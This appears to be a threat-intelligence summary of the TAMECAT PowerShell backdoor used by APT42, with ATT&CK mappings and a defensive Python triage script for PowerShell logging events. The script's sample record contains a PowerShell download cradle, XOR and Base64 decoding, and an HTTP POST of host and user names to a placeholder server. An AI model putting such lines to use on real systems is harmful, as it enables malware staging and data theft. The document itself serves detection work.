EXECUTIVE SUMMARY
TAMECAT is a PowerShell-based malware used by APT42, an Iranian state-sponsored cyber-espionage actor, built to support stealthy command execution and data collection during espionage operations. Reporting highlights its modular architecture, which allows APT42 operators to expand or modify functionality depending on the target environment. The malware has been observed in campaigns focused on high-value defense and government officials, where access is gained through prolonged social engineering rather than rapid exploitation. This approach helps establish trust and lowers suspicion before malware delivery. TAMECAT supports capabilities such as browser data extraction, screen capture, and system profiling, while relying heavily on in-memory execution to limit forensic artifacts. Commands and additional payloads are delivered dynamically, allowing APT42 to maintain flexibility and control throughout the intrusion lifecycle.
The infection chain begins with a lightweight VBScript that profiles the host by enumerating installed antivirus products. Based on the results, it selects an execution method to download and launch a PowerShell-based loader. This loader uses obfuscation, encoded configuration values, and encrypted payloads that are decrypted only at runtime. Additional stages are retrieved from remote locations using encoded URLs and browser-like user-agent strings. Retrieved content undergoes multiple transformations, including bitwise operations and AES decryption, before execution. The malware generates a unique victim identifier, collects system metadata, and encrypts the data prior to exfiltration.
Communication with the command server occurs over HTTP POST requests, and responses are decoded into structured fields that control execution flow, enabling dynamic tasking and payload management. TAMECAT demonstrates a mature and evolving malware design that emphasizes flexibility, stealth, and persistence. Repeated design patterns across variants suggest active development and reuse in multiple espionage campaigns. Heavy reliance on PowerShell, in-memory execution, and layered obfuscation complicates detection and analysis efforts. Encrypted command-and-control communications further protect operational intent and reduce visibility. Combined with patient social engineering tactics, TAMECAT enables sustained access to targeted environments rather than immediate impact. This blend of technical sophistication and human-driven intrusion highlights how modern espionage tooling prioritizes long-term intelligence collection while minimizing exposure.
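The two paragraphs above describe a chain whose individual steps (a WMI query against SecurityCenter2, Base64 decoding, a bitwise transform, an AES primitive, a download cradle with a browser-like User-Agent, an HTTP POST) are each common in legitimate administration, so a defender gains far more from detecting their co-occurrence in one script block than from any single indicator. The following is an added example, not code from the report or from either of the cited analyses: a small triage helper over PowerShell Script Block Logging (Event ID 4104) records that maps each behaviour to the ATT&CK ID from the threat profile below and alerts only when several fire together. The regexes, the alert threshold, the hostnames, the PIDs and the `placeholder.invalid` URL are all my assumptions; the two sample records are constructed, not real telemetry.

```python
"""
Hypothetical triage helper for PowerShell Script Block Logging (Event ID 4104)
records, written as an added example for this summary. It scores each script
block against the behaviours the summary attributes to TAMECAT (security
software enumeration over WMI, encoded configuration, runtime bitwise/AES
decoding, download cradle with a browser-like User-Agent, HTTP POST to C2,
host profiling) and flags blocks in which several of them co-occur.
The patterns and the threshold are assumptions, not indicators from the report.
"""
import re
from typing import Dict, List

# (ATT&CK ID from the threat profile table, label, case-insensitive pattern)
RULES = [
    ("T1518.001", "security software enumeration",
     r"SecurityCenter2|AntiVirusProduct"),
    ("T1047", "WMI/CIM query",
     r"Get-WmiObject|Get-CimInstance|\bwmic\b"),
    ("T1027.013", "encoded or encrypted data",
     r"FromBase64String|-EncodedCommand|\s-e(nc|c)?\s"),
    ("T1140", "runtime decode / bitwise transform",
     r"-bxor|\[char\]\s*\(|-join\s*\("),
    ("T1573.001", "symmetric crypto primitive",
     r"AesManaged|AesCryptoServiceProvider|Cryptography\.Aes\b|CreateDecryptor"),
    ("T1105", "download cradle with custom User-Agent",
     r"(DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient).*User-?Agent"
     r"|User-?Agent.*(DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod)"),
    ("T1071.001", "HTTP POST",
     r"-Method\s+POST|UploadString|UploadData"),
    ("T1082", "host profiling",
     r"Win32_OperatingSystem|Win32_ComputerSystem|\$env:COMPUTERNAME|\$env:USERNAME"),
]
COMPILED = [(tid, label, re.compile(pat, re.IGNORECASE | re.DOTALL))
            for tid, label, pat in RULES]

# Minimum number of distinct techniques in one block before alerting: any single
# rule also fires on ordinary admin scripts, so co-occurrence is what matters.
ALERT_THRESHOLD = 4


def match_techniques(script_block: str) -> List[str]:
    """Return the ATT&CK IDs whose pattern appears in the script block (rule order)."""
    return [tid for tid, _, rx in COMPILED if rx.search(script_block)]


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score each 4104-style record; 'alert' when enough techniques co-occur,
    'info' when at least one fires, 'clean' otherwise."""
    results = []
    for ev in events:
        hits = match_techniques(ev["script_block"])
        verdict = "alert" if len(hits) >= ALERT_THRESHOLD else "info" if hits else "clean"
        results.append({"host": ev["host"], "pid": ev["pid"],
                        "techniques": hits, "verdict": verdict})
    return results


# Constructed sample records (not real telemetry); hosts, PIDs and URL are placeholders.
SAMPLE_EVENTS = [
    {   # routine inventory script an administrator might run
        "host": "ws01.example.internal", "pid": "4120",
        "script_block": "Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version",
    },
    {   # block exhibiting the behaviours the summary describes, with no payload
        "host": "ws02.example.internal", "pid": "5588",
        "script_block": (
            "$av = Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct\n"
            "$wc = New-Object Net.WebClient; $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0)')\n"
            "$raw = $wc.DownloadString('https://placeholder.invalid/stage2')\n"
            "$b = [Convert]::FromBase64String($raw) | ForEach-Object { $_ -bxor 0x5A }\n"
            "$aes = New-Object Security.Cryptography.AesManaged\n"
            "$id = $env:COMPUTERNAME + $env:USERNAME\n"
            "Invoke-RestMethod -Uri 'https://placeholder.invalid/gate' -Method POST -Body $id"
        ),
    },
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['host']} pid={r['pid']} verdict={r['verdict']} techniques={r['techniques']}")
```

Run against the constructed records, the inventory script scores two techniques (WMI/CIM query and host profiling) and stays at "info", while the second block trips all eight rules and is flagged. The threshold is the tunable part: lowering it raises recall against trimmed variants of the chain at the cost of more admin-script noise, and the rule list can be extended with the exact strings observed in the cited analyses without changing the scoring logic.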
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1047 | Windows Management Instrumentation | – |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | – |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted or Encoded Data |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Discovery | T1082 | System Information Discovery | – |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1132.001 | Data Encoding | Standard Encoding |
| Command and Control | T1105 | Ingress Tool Transfer | – |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | – |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
|---|---|---|
| Discovery | B0013 | Analysis Tool Discovery |
| Execution | E1059 | Command and Scripting Interpreter |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| Collection | E1082 | System Information Discovery |
REFERENCES:
The following reports contain further
https://cybersecuritynews.com/tamecat-powershell-based-backdoor-exfiltrates-login-credentials/
https://blog.pulsedive.com/tamecat-analysis-of-an-iranian-powershell-based-backdoor/